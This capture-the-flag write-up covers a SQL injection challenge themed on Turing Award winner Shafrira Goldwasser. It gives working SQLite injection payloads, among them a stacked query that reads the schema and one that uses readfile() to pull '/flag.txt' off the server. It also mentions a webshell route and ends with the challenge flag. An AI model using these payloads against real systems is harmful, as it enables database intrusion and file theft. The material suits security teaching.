Shafrira Goldwasser
Shafrira Goldwasser (Hebrew: שפרירה גולדווסר; born 1959) is an Israeli-American computer scientist and winner of the Turing Award in 2012. She is the RSA Professor of Electrical Engineering and Computer Science at Massachusetts Institute of Technology; a professor of mathematical sciences at the Weizmann Institute of Science, Israel; the director of the Simons Institute for the Theory of Computing at the University of California, Berkeley; and co-founder and chief scientist of Duality Technologies.
Description
Chal: I asked ChatGPT to make this webapp but I couldnt prove it was secure. In honor of this Turing Award winner, prove it is insecure by returning the flag.
Alternate (Better) Link: Webapp
Author: TJ
Source: webapp.zip (Provided later)
Solution

The website lets us choose a Cyber Heroine and read her biography. The most probable attack vector is SQLi, since the biography text has to come from a database somewhere. Quickly testing the classic payload: ' OR 1=1 --

SQLi is confirmed.
Now we need to identify the DBMS. Since the application is simple and small, it's probably SQLite3.
Trying a simple stacked-query payload: '; SELECT sql FROM sqlite_schema --
(The query turned out to allow stacked statements, so there was no need for UNION. Note that sqlite_schema is only an alias for sqlite_master since SQLite 3.33.0; on older versions use sqlite_master.)
CREATE TABLE "cyberheroines" ("name" TEXT, "biography" TEXT)
Hmmm... There's only one table? We already saw its records earlier, so where is the flag?
Looking into PayloadsAllTheThings: SQLite: "Remote Command Execution using SQLite command - Attach Database". We could potentially turn the SQLi into RCE if we managed to attach a new database under the web root and write PHP code into it as a webshell. That route is out here, because the application runs on Python, not PHP.

But we can create a table, insert arbitrary file contents into it with readfile(), and read the table back for profit.
';
CREATE TABLE letmein (uwu TEXT);
INSERT INTO letmein VALUES (readfile('/flag.txt'));
SELECT * FROM letmein;
DROP TABLE letmein;
/*
Close the open quote to break out of the original query
Create a scratch table
Read the flag file into it with readfile() [8.3. File I/O Functions: readfile]. readfile() is not part of SQLite's core; it comes from the fileio extension that ships with the sqlite3 command-line shell, so this only works because the application makes that function available (as it evidently did here).
Read the contents back from the table
Drop the table (the challenge is still running for other players, after all). The trailing /* comments out the closing quote the application appends to the query.
Flag: chctf{CH4ng3d_h0w_w3_th1Nk_of_pr00f$}
Note
If challenge is broken you know who to blame